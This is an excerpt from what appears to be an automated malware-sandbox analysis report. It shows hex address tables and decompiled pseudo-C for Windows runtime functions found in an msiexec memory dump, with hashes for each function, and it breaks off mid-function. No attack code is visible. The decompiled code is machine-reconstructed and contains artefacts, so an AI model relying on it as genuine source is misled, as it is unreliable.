                              0x00000000
                              0x04d32794
                              0x04d32794
                              0x04d32795
                              0x04d32798
                              0x04d32798
                              0x00000000
                              0x04d32734
                              0x04d3272c
                              0x04d32700
                              0x04d325ef
                              0x04d325ef
                              0x04d325ef
                              0x04d325f2
                              0x04d325f8
                              0x00000000
                              0x00000000
                              0x04d325fe
                              0x00000000
                              0x04d328e6
                              0x04d328ec
                              0x04d328ef
                              0x04d328f5
                              0x04d328f8
                              0x04d328f8
                              0x00000000
                              0x04d328f8
                              0x00000000
                              0x00000000
                              0x04d32866
                              0x04d32866
                              0x04d32876
                              0x04d32879
                              0x00000000
                              0x00000000
                              0x04d327e0
                              0x04d327e7
                              0x04d327e9
                              0x04d327eb
                              0x04d75afd
                              0x00000000
                              0x04d75afd
                              0x00000000
                              0x00000000
                              0x04d32633
                              0x04d32638
                              0x04d3263b
                              0x04d3263c
                              0x04d3263e
                              0x04d32640
                              0x04d32642
                              0x04d32647
                              0x04d32649
                              0x04d3264e
                              0x04d32650
                              0x04d32653
                              0x04d32659
                              0x04d326a2
                              0x04d326a7
                              0x04d326ac
                              0x04d326b2
                              0x04d75b11
                              0x04d75b15
                              0x04d75b17
                              0x00000000
                              0x04d326b8
                              0x04d326b8
                              0x04d326ba
                              0x04d327a6
                              0x04d327a6
                              0x04d327a9
                              0x04d327ab
                              0x04d327b9
                              0x04d327b9
                              0x04d327be
                              0x04d327c1
                              0x04d327c3
                              0x04d327c5
                              0x04d327c7
                              0x04d75c74
                              0x04d75c79
                              0x04d75c79
                              0x04d327c7
                              0x00000000
                              0x04d326c0
                              0x04d326c0
                              0x04d326c3
                              0x04d326c6
                              0x04d326c6
                              0x04d326c9
                              0x04d326c9
                              0x00000000
                              0x04d326c9
                              0x04d326ba
                              0x04d3265b
                              0x04d3265b
                              0x04d3265e
                              0x04d32667
                              0x04d3266d
                              0x04d32677
                              0x04d3267c
                              0x04d3267f
                              0x04d32681
                              0x04d75b49
                              0x04d75b4e
                              0x04d327cd
                              0x04d327d0
                              0x04d327d1
                              0x04d327d2
                              0x04d327d4
                              0x04d327dd
                              0x04d32687
                              0x04d32687
                              0x04d3268a
                              0x04d3268b
                              0x04d3268e
                              0x04d3268f
                              0x04d32691
                              0x04d32696
                              0x04d32698
                              0x04d3269d
                              0x04d3269f
                              0x00000000
                              0x04d3269f
                              0x04d32681
                              0x00000000
                              0x00000000
                              0x04d32846
                              0x00000000
                              0x00000000
                              0x04d32605
                              0x04d3260a
                              0x04d3260c
                              0x04d32611
                              0x04d32616
                              0x04d32619
                              0x04d32619
                              0x04d3261e
                              0x00000000
                              0x04d32624
                              0x04d32627
                              0x04d32627
                              0x00000000
                              0x00000000
                              0x04d75b1f
                              0x00000000
                              0x00000000
                              0x04d32894
                              0x04d3289b
                              0x04d3289d
                              0x04d328a1
                              0x04d75b2b
                              0x04d75b2e
                              0x04d75b2e
                              0x04d328a7
                              0x04d328a9
                              0x04d75b04
                              0x04d75b09
                              0x04d75b09
                              0x04d75b09
                              0x00000000
                              0x00000000
                              0x04d75b35
                              0x04d75b3c
                              0x04d328fb
                              0x04d328fb
                              0x04d326cc
                              0x04d326cc
                              0x04d326d0
                              0x00000000
                              0x04d326d2
                              0x04d326d2
                              0x00000000
                              0x04d326d2
                              0x00000000
                              0x00000000
                              0x04d325fe
                              0x04d3292d
                              0x04d32930
                              0x04d32935
                              0x04d32937
                              0x04d3293e
                              0x04d3293f
                              0x04d32942
                              0x04d3294a
                              0x04d3294f
                              0x04d32957
                              0x04d32962
                              0x04d32963
                              0x04d3296e
                              0x04d3296f
                              0x04d32972
                              0x04d32973
                              0x04d32976
                              0x04d3297a
                              0x04d3297b
                              0x04d3297e
                              0x04d3297f
                              0x04d32980
                              0x04d32981
                              0x04d32982
                              0x04d32983
                              0x04d32984
                              0x04d32985
                              0x04d32986
                              0x04d32987
                              0x04d32988
                              0x04d32989
                              0x04d3298a
                              0x04d3298b
                              0x04d3298c
                              0x04d3298d
                              0x04d3298e
                              0x04d3298f
                              0x04d32990
                              0x04d32992
                              0x04d32997
                              0x04d329a3
                              0x04d329a6
                              0x04d329ab
                              0x04d329ad
                              0x04d329b0
                              0x04d329b2
                              0x04d75c80
                              0x04d329b8
                              0x04d329b8
                              0x04d329bb
                              0x04d329c0
                              0x04d329c5
                              0x04d329c6
                              0x04d329c6
                              0x04d329c9
                              0x04d329cb
                              0x00000000
                              0x00000000
                              0x04d329cd
                              0x04d329d0
                              0x04d329d9
                              0x04d329db
                              0x04d329dd
                              0x04d32a7f
                              0x04d32a84
                              0x04d32a87
                              0x04d32a89
                              0x04d75ca1
                              0x04d75ca3
                              0x00000000
                              0x04d32a8f
                              0x04d32a8f
                              0x00000000
                              0x04d32a8f
                              0x00000000
                              0x04d329e3
                              0x04d329e3
                              0x04d329e3
                              0x00000000
                              0x04d329e3
                              0x04d329dd
                              0x00000000
                              0x04d329db
                              0x04d329e6
                              0x04d329e9
                              0x04d329eb
                              0x04d329ed
                              0x04d329f3
                              0x04d329f5
                              0x04d329f8
                              0x04d329fa
                              0x04d32a97
                              0x04d32a9a
                              0x04d32a9d
                              0x04d32add
                              0x00000000
                              0x04d32a9f
                              0x04d32aa2
                              0x04d32aa5
                              0x04d32aa8
                              0x04d32aab
                              0x04d75cab
                              0x04d75caf
                              0x04d75cc5
                              0x04d75cda
                              0x04d75cdc
                              0x04d75cdf
                              0x04d75ce5
                              0x00000000
                              0x04d75ceb
                              0x04d75ced
                              0x04d75cee
                              0x00000000
                              0x04d75cee
                              0x04d75cb1
                              0x04d75cb4
                              0x04d75cb9
                              0x04d75cbb
                              0x00000000
                              0x04d75cbd
                              0x04d75cbd
                              0x00000000
                              0x04d75cbd
                              0x04d75cbb
                              0x04d32ab1
                              0x04d32ab1
                              0x04d32ac4
                              0x04d32ac6
                              0x04d32ac6
                              0x00000000
                              0x04d32ac6
                              0x04d32aab
                              0x00000000
                              0x04d32a00
                              0x04d32a09
                              0x04d32a0e
                              0x04d32a21
                              0x04d32a24
                              0x04d32a35
                              0x04d32a3a
                              0x04d32a3d
                              0x04d32a42
                              0x04d32a59
                              0x04d32a59
                              0x04d32a5c
                              0x04d32a5f
                              0x04d32a5f
                              0x04d329fa
                              0x04d329f3
                              0x04d32a64
                              0x04d32a64
                              0x04d32a6b
                              0x04d32a6b
                              0x04d32a6d
                              0x04d32a72
                              0x04d32a72
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: PATH
                              • API String ID: 0-1036084923
                              • Opcode ID: 5df4afaf8786379e5fa654e2fc361f7e9dbaef4134e44013bc0413a316b81e13
                              • Instruction ID: 8176260b5e87e78164e4213a55562e6f94a7299f204b1364143e3cbd026ebba6
                              • Opcode Fuzzy Hash: 5df4afaf8786379e5fa654e2fc361f7e9dbaef4134e44013bc0413a316b81e13
                              • Instruction Fuzzy Hash: 12C17CB1E00219EBDB25DFA8D891BBEB7B1FF48705F044069E941AB350E734B941DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E04D3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                              				char _v5;
                              				signed int _v8;
                              				signed int _v12;
                              				char _v16;
                              				char _v17;
                              				char _v20;
                              				signed int _v24;
                              				char _v28;
                              				char _v32;
                              				signed int _v40;
                              				void* __ecx;
                              				void* __edi;
                              				void* __ebp;
                              				signed int _t73;
                              				intOrPtr* _t75;
                              				signed int _t77;
                              				signed int _t79;
                              				signed int _t81;
                              				intOrPtr _t83;
                              				intOrPtr _t85;
                              				intOrPtr _t86;
                              				signed int _t91;
                              				signed int _t94;
                              				signed int _t95;
                              				signed int _t96;
                              				signed int _t106;
                              				signed int _t108;
                              				signed int _t114;
                              				signed int _t116;
                              				signed int _t118;
                              				signed int _t122;
                              				signed int _t123;
                              				void* _t129;
                              				signed int _t130;
                              				void* _t132;
                              				intOrPtr* _t134;
                              				signed int _t138;
                              				signed int _t141;
                              				signed int _t147;
                              				intOrPtr _t153;
                              				signed int _t154;
                              				signed int _t155;
                              				signed int _t170;
                              				void* _t174;
                              				signed int _t176;
                              				signed int _t177;
                              
                              				_t129 = __ebx;
                              				_push(_t132);
                              				_push(__esi);
                              				_t174 = _t132;
                              				_t73 =  !( *( *(_t174 + 0x18)));
                              				if(_t73 >= 0) {
                              					L5:
                              					return _t73;
                              				} else {
                              					E04D1EEF0(0x4df7b60);
                              					_t134 =  *0x4df7b84; // 0x771c7b80
                              					_t2 = _t174 + 0x24; // 0x24
                              					_t75 = _t2;
                              					if( *_t134 != 0x4df7b80) {
                              						_push(3);
                              						asm("int 0x29");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						asm("int3");
                              						_push(0x4df7b60);
                              						_t170 = _v8;
                              						_v28 = 0;
                              						_v40 = 0;
                              						_v24 = 0;
                              						_v17 = 0;
                              						_v32 = 0;
                              						__eflags = _t170 & 0xffff7cf2;
                              						if((_t170 & 0xffff7cf2) != 0) {
                              							L43:
                              							_t77 = 0xc000000d;
                              						} else {
                              							_t79 = _t170 & 0x0000000c;
                              							__eflags = _t79;
                              							if(_t79 != 0) {
                              								__eflags = _t79 - 0xc;
                              								if(_t79 == 0xc) {
                              									goto L43;
                              								} else {
                              									goto L9;
                              								}
                              							} else {
                              								_t170 = _t170 | 0x00000008;
                              								__eflags = _t170;
                              								L9:
                              								_t81 = _t170 & 0x00000300;
                              								__eflags = _t81 - 0x300;
                              								if(_t81 == 0x300) {
                              									goto L43;
                              								} else {
                              									_t138 = _t170 & 0x00000001;
                              									__eflags = _t138;
                              									_v24 = _t138;
                              									if(_t138 != 0) {
                              										__eflags = _t81;
                              										if(_t81 != 0) {
                              											goto L43;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										L11:
                              										_push(_t129);
                              										_t77 = E04D16D90( &_v20);
                              										_t130 = _t77;
                              										__eflags = _t130;
                              										if(_t130 >= 0) {
                              											_push(_t174);
                              											__eflags = _t170 & 0x00000301;
                              											if((_t170 & 0x00000301) == 0) {
                              												_t176 = _a8;
                              												__eflags = _t176;
                              												if(__eflags == 0) {
                              													L64:
                              													_t83 =  *[fs:0x18];
                              													_t177 = 0;
                              													__eflags =  *(_t83 + 0xfb8);
                              													if( *(_t83 + 0xfb8) != 0) {
                              														E04D176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                              													}
                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                              													goto L15;
                              												} else {
                              													asm("sbb edx, edx");
                              													_t114 = E04DA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                              													__eflags = _t114;
                              													if(_t114 < 0) {
                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                              														E04D0B150();
                              													}
                              													_t116 = E04DA6D81(_t176,  &_v16);
                              													__eflags = _t116;
                              													if(_t116 >= 0) {
                              														__eflags = _v16 - 2;
                              														if(_v16 < 2) {
                              															L56:
                              															_t118 = E04D175CE(_v20, 5, 0);
                              															__eflags = _t118;
                              															if(_t118 < 0) {
                              																L67:
                              																_t130 = 0xc0000017;
                              																goto L32;
                              															} else {
                              																__eflags = _v12;
                              																if(_v12 == 0) {
                              																	goto L67;
                              																} else {
                              																	_t153 =  *0x4df8638; // 0x305dc18
                              																	_t122 = L04D138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                              																	_t154 = _v12;
                              																	_t130 = _t122;
                              																	__eflags = _t130;
                              																	if(_t130 >= 0) {
                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                              																		__eflags = _t123;
                              																		if(_t123 != 0) {
                              																			_t155 = _a12;
                              																			__eflags = _t155;
                              																			if(_t155 != 0) {
                              																				 *_t155 = _t123;
                              																			}
                              																			goto L64;
                              																		} else {
                              																			E04D176E2(_t154);
                              																			goto L41;
                              																		}
                              																	} else {
                              																		E04D176E2(_t154);
                              																		_t177 = 0;
                              																		goto L18;
                              																	}
                              																}
                              															}
                              														} else {
                              															__eflags =  *_t176;
                              															if( *_t176 != 0) {
                              																goto L56;
                              															} else {
                              																__eflags =  *(_t176 + 2);
                              																if( *(_t176 + 2) == 0) {
                              																	goto L64;
                              																} else {
                              																	goto L56;
                              																}
                              															}
                              														}
                              													} else {
                              														_t130 = 0xc000000d;
                              														goto L32;
                              													}
                              												}
                              												goto L35;
                              											} else {
                              												__eflags = _a8;
                              												if(_a8 != 0) {
                              													_t77 = 0xc000000d;
                              												} else {
                              													_v5 = 1;
                              													L04D3FCE3(_v20, _t170);
                              													_t177 = 0;
                              													__eflags = 0;
                              													L15:
                              													_t85 =  *[fs:0x18];
                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                              														L18:
                              														__eflags = _t130;
                              														if(_t130 != 0) {
                              															goto L32;
                              														} else {
                              															__eflags = _v5 - _t130;
                              															if(_v5 == _t130) {
                              																goto L32;
                              															} else {
                              																_t86 =  *[fs:0x18];
                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                              																}
                              																__eflags = _t177;
                              																if(_t177 == 0) {
                              																	L31:
                              																	__eflags = 0;
                              																	L04D170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                              																	goto L32;
                              																} else {
                              																	__eflags = _v24;
                              																	_t91 =  *(_t177 + 0x20);
                              																	if(_v24 != 0) {
                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                              																		goto L31;
                              																	} else {
                              																		_t141 = _t91 & 0x00000040;
                              																		__eflags = _t170 & 0x00000100;
                              																		if((_t170 & 0x00000100) == 0) {
                              																			__eflags = _t141;
                              																			if(_t141 == 0) {
                              																				L74:
                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                              																				goto L27;
                              																			} else {
                              																				_t177 = E04D3FD22(_t177);
                              																				__eflags = _t177;
                              																				if(_t177 == 0) {
                              																					goto L42;
                              																				} else {
                              																					_t130 = E04D3FD9B(_t177, 0, 4);
                              																					__eflags = _t130;
                              																					if(_t130 != 0) {
                              																						goto L42;
                              																					} else {
                              																						_t68 = _t177 + 0x20;
                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                              																						__eflags =  *_t68;
                              																						_t91 =  *(_t177 + 0x20);
                              																						goto L74;
                              																					}
                              																				}
                              																			}
                              																			goto L35;
                              																		} else {
                              																			__eflags = _t141;
                              																			if(_t141 != 0) {
                              																				_t177 = E04D3FD22(_t177);
                              																				__eflags = _t177;
                              																				if(_t177 == 0) {
                              																					L42:
                              																					_t77 = 0xc0000001;
                              																					goto L33;
                              																				} else {
                              																					_t130 = E04D3FD9B(_t177, 0, 4);
                              																					__eflags = _t130;
                              																					if(_t130 != 0) {
                              																						goto L42;
                              																					} else {
                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                              																						_t91 =  *(_t177 + 0x20);
                              																						goto L26;
                              																					}
                              																				}
                              																				goto L35;
                              																			} else {
                              																				L26:
                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                              																				__eflags = _t94;
                              																				L27:
                              																				 *(_t177 + 0x20) = _t94;
                              																				__eflags = _t170 & 0x00008000;
                              																				if((_t170 & 0x00008000) != 0) {
                              																					_t95 = _a12;
                              																					__eflags = _t95;
                              																					if(_t95 != 0) {
                              																						_t96 =  *_t95;
                              																						__eflags = _t96;
                              																						if(_t96 != 0) {
                              																							 *((short*)(_t177 + 0x22)) = 0;
                              																							_t40 = _t177 + 0x20;
                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                              																							__eflags =  *_t40;
                              																						}
                              																					}
                              																				}
                              																				goto L31;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                              														_t106 =  *(_t147 + 0x20);
                              														__eflags = _t106 & 0x00000040;
                              														if((_t106 & 0x00000040) != 0) {
                              															_t147 = E04D3FD22(_t147);
                              															__eflags = _t147;
                              															if(_t147 == 0) {
                              																L41:
                              																_t130 = 0xc0000001;
                              																L32:
                              																_t77 = _t130;
                              																goto L33;
                              															} else {
                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                              																_t106 =  *(_t147 + 0x20);
                              																goto L17;
                              															}
                              															goto L35;
                              														} else {
                              															L17:
                              															_t108 = _t106 | 0x00000080;
                              															__eflags = _t108;
                              															 *(_t147 + 0x20) = _t108;
                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                              															goto L18;
                              														}
                              													}
                              												}
                              											}
                              											L33:
                              										}
                              									}
                              								}
                              							}
                              						}
                              						L35:
                              						return _t77;
                              					} else {
                              						 *_t75 = 0x4df7b80;
                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                              						 *_t134 = _t75;
                              						 *0x4df7b84 = _t75;
                              						_t73 = E04D1EB70(_t134, 0x4df7b60);
                              						if( *0x4df7b20 != 0) {
                              							_t73 =  *( *[fs:0x30] + 0xc);
                              							if( *((char*)(_t73 + 0x28)) == 0) {
                              								_t73 = E04D1FF60( *0x4df7b20);
                              							}
                              						}
                              						goto L5;
                              					}
                              				}
                              			}


















































                              Strings
                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04D7BE0F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                              • API String ID: 0-865735534
                              • Opcode ID: 852cb29dcff2db228710cd25339d9e7659be74dcc36c28e4654909830709814b
                              • Instruction ID: 2e937c198037dd7fe8dd8f03881e2e5c3dcb88aa8c8e87fee31eecbc09897165
                              • Opcode Fuzzy Hash: 852cb29dcff2db228710cd25339d9e7659be74dcc36c28e4654909830709814b
                              • Instruction Fuzzy Hash: 22A1D171F006099FEB25DF64C494BBAB3A5FB44B19F04456EE8469B790EB34F841CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E04D02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                              				signed char _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				signed int _v52;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t55;
                              				signed int _t57;
                              				signed int _t58;
                              				char* _t62;
                              				signed char* _t63;
                              				signed char* _t64;
                              				signed int _t67;
                              				signed int _t72;
                              				signed int _t77;
                              				signed int _t78;
                              				signed int _t88;
                              				intOrPtr _t89;
                              				signed char _t93;
                              				signed int _t97;
                              				signed int _t98;
                              				signed int _t102;
                              				signed int _t103;
                              				intOrPtr _t104;
                              				signed int _t105;
                              				signed int _t106;
                              				signed char _t109;
                              				signed int _t111;
                              				void* _t116;
                              
                              				_t102 = __edi;
                              				_t97 = __edx;
                              				_v12 = _v12 & 0x00000000;
                              				_t55 =  *[fs:0x18];
                              				_t109 = __ecx;
                              				_v8 = __edx;
                              				_t86 = 0;
                              				_v32 = _t55;
                              				_v24 = 0;
                              				_push(__edi);
                              				if(__ecx == 0x4df5350) {
                              					_t86 = 1;
                              					_v24 = 1;
                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                              				}
                              				_t103 = _t102 | 0xffffffff;
                              				if( *0x4df7bc8 != 0) {
                              					_push(0xc000004b);
                              					_push(_t103);
                              					E04D497C0();
                              				}
                              				if( *0x4df79c4 != 0) {
                              					_t57 = 0;
                              				} else {
                              					_t57 = 0x4df79c8;
                              				}
                              				_v16 = _t57;
                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                              					_t93 = _t109;
                              					L23();
                              				}
                              				_t58 =  *_t109;
                              				if(_t58 == _t103) {
                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                              					_t58 = _t103;
                              					if(__eflags == 0) {
                              						_t93 = _t109;
                              						E04D31624(_t86, __eflags);
                              						_t58 =  *_t109;
                              					}
                              				}
                              				_v20 = _v20 & 0x00000000;
                              				if(_t58 != _t103) {
                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                              				}
                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                              				_t88 = _v16;
                              				_v28 = _t104;
                              				L9:
                              				while(1) {
                              					if(E04D27D50() != 0) {
                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                              					} else {
                              						_t62 = 0x7ffe0382;
                              					}
                              					if( *_t62 != 0) {
                              						_t63 =  *[fs:0x30];
                              						__eflags = _t63[0x240] & 0x00000002;
                              						if((_t63[0x240] & 0x00000002) != 0) {
                              							_t93 = _t109;
                              							E04D9FE87(_t93);
                              						}
                              					}
                              					if(_t104 != 0xffffffff) {
                              						_push(_t88);
                              						_push(0);
                              						_push(_t104);
                              						_t64 = E04D49520();
                              						goto L15;
                              					} else {
                              						while(1) {
                              							_t97 =  &_v8;
                              							_t64 = E04D3E18B(_t109 + 4, _t97, 4, _t88, 0);
                              							if(_t64 == 0x102) {
                              								break;
                              							}
                              							_t93 =  *(_t109 + 4);
                              							_v8 = _t93;
                              							if((_t93 & 0x00000002) != 0) {
                              								continue;
                              							}
                              							L15:
                              							if(_t64 == 0x102) {
                              								break;
                              							}
                              							_t89 = _v24;
                              							if(_t64 < 0) {
                              								L04D5DF30(_t93, _t97, _t64);
                              								_push(_t93);
                              								_t98 = _t97 | 0xffffffff;
                              								__eflags =  *0x4df6901;
                              								_push(_t109);
                              								_v52 = _t98;
                              								if( *0x4df6901 != 0) {
                              									_push(0);
                              									_push(1);
                              									_push(0);
                              									_push(0x100003);
                              									_push( &_v12);
                              									_t72 = E04D49980();
                              									__eflags = _t72;
                              									if(_t72 < 0) {
                              										_v12 = _t98 | 0xffffffff;
                              									}
                              								}
                              								asm("lock cmpxchg [ecx], edx");
                              								_t111 = 0;
                              								__eflags = 0;
                              								if(0 != 0) {
                              									__eflags = _v12 - 0xffffffff;
                              									if(_v12 != 0xffffffff) {
                              										_push(_v12);
                              										E04D495D0();
                              									}
                              								} else {
                              									_t111 = _v12;
                              								}
                              								return _t111;
                              							} else {
                              								if(_t89 != 0) {
                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                              									_t77 = E04D27D50();
                              									__eflags = _t77;
                              									if(_t77 == 0) {
                              										_t64 = 0x7ffe0384;
                              									} else {
                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                              									}
                              									__eflags =  *_t64;
                              									if( *_t64 != 0) {
                              										_t64 =  *[fs:0x30];
                              										__eflags = _t64[0x240] & 0x00000004;
                              										if((_t64[0x240] & 0x00000004) != 0) {
                              											_t78 = E04D27D50();
                              											__eflags = _t78;
                              											if(_t78 == 0) {
                              												_t64 = 0x7ffe0385;
                              											} else {
                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                              											}
                              											__eflags =  *_t64 & 0x00000020;
                              											if(( *_t64 & 0x00000020) != 0) {
                              												_t64 = E04D87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                              											}
                              										}
                              									}
                              								}
                              								return _t64;
                              							}
                              						}
                              						_t97 = _t88;
                              						_t93 = _t109;
                              						E04D9FDDA(_t97, _v12);
                              						_t105 =  *_t109;
                              						_t67 = _v12 + 1;
                              						_v12 = _t67;
                              						__eflags = _t105 - 0xffffffff;
                              						if(_t105 == 0xffffffff) {
                              							_t106 = 0;
                              							__eflags = 0;
                              						} else {
                              							_t106 =  *(_t105 + 0x14);
                              						}
                              						__eflags = _t67 - 2;
                              						if(_t67 > 2) {
                              							__eflags = _t109 - 0x4df5350;
                              							if(_t109 != 0x4df5350) {
                              								__eflags = _t106 - _v20;
                              								if(__eflags == 0) {
                              									_t93 = _t109;
                              									E04D9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                              								}
                              							}
                              						}
                              						_push("RTL: Re-Waiting\n");
                              						_push(0);
                              						_push(0x65);
                              						_v20 = _t106;
                              						E04D95720();
                              						_t104 = _v28;
                              						_t116 = _t116 + 0xc;
                              						continue;
                              					}
                              				}
                              			}





































                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Re-Waiting
                              • API String ID: 0-316354757
                              • Opcode ID: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
                              • Instruction ID: 5e2899c076c65073a6ee877cd9e1a688c249a377e1a7197f54556aba72074cef
                              • Opcode Fuzzy Hash: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
                              • Instruction Fuzzy Hash: 96612431B01604ABEF31DF68C888B7E77A5FB41318F1446AAD851DB2D1DB74BD0187A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E04DD0EA5(void* __ecx, void* __edx) {
                              				signed int _v20;
                              				char _v24;
                              				intOrPtr _v28;
                              				unsigned int _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				intOrPtr _v64;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t58;
                              				unsigned int _t60;
                              				intOrPtr _t62;
                              				char* _t67;
                              				char* _t69;
                              				void* _t80;
                              				void* _t83;
                              				intOrPtr _t93;
                              				intOrPtr _t115;
                              				char _t117;
                              				void* _t120;
                              
                              				_t83 = __edx;
                              				_t117 = 0;
                              				_t120 = __ecx;
                              				_v44 = 0;
                              				if(E04DCFF69(__ecx,  &_v44,  &_v32) < 0) {
                              					L24:
                              					_t109 = _v44;
                              					if(_v44 != 0) {
                              						E04DD1074(_t83, _t120, _t109, _t117, _t117);
                              					}
                              					L26:
                              					return _t117;
                              				}
                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                              				_t5 = _t83 + 1; // 0x1
                              				_v36 = _t5 << 0xc;
                              				_v40 = _t93;
                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                              				asm("sbb ebx, ebx");
                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                              				if(_t58 != 0) {
                              					_push(0);
                              					_push(0x14);
                              					_push( &_v24);
                              					_push(3);
                              					_push(_t93);
                              					_push(0xffffffff);
                              					_t80 = E04D49730();
                              					_t115 = _v64;
                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                              						_push(_t93);
                              						E04DCA80D(_t115, 1, _v20, _t117);
                              						_t83 = 4;
                              					}
                              				}
                              				if(E04DCA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                              					goto L24;
                              				}
                              				_t60 = _v32;
                              				_t97 = (_t60 != 0x100000) + 1;
                              				_t83 = (_v44 -  *0x4df8b04 >> 0x14) + (_v44 -  *0x4df8b04 >> 0x14);
                              				_v28 = (_t60 != 0x100000) + 1;
                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                              				_v40 = _t62;
                              				if(_t83 >= _t62) {
                              					L10:
                              					asm("lock xadd [eax], ecx");
                              					asm("lock xadd [eax], ecx");
                              					if(E04D27D50() == 0) {
                              						_t67 = 0x7ffe0380;
                              					} else {
                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						E04DC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                              					}
                              					if(E04D27D50() == 0) {
                              						_t69 = 0x7ffe0388;
                              					} else {
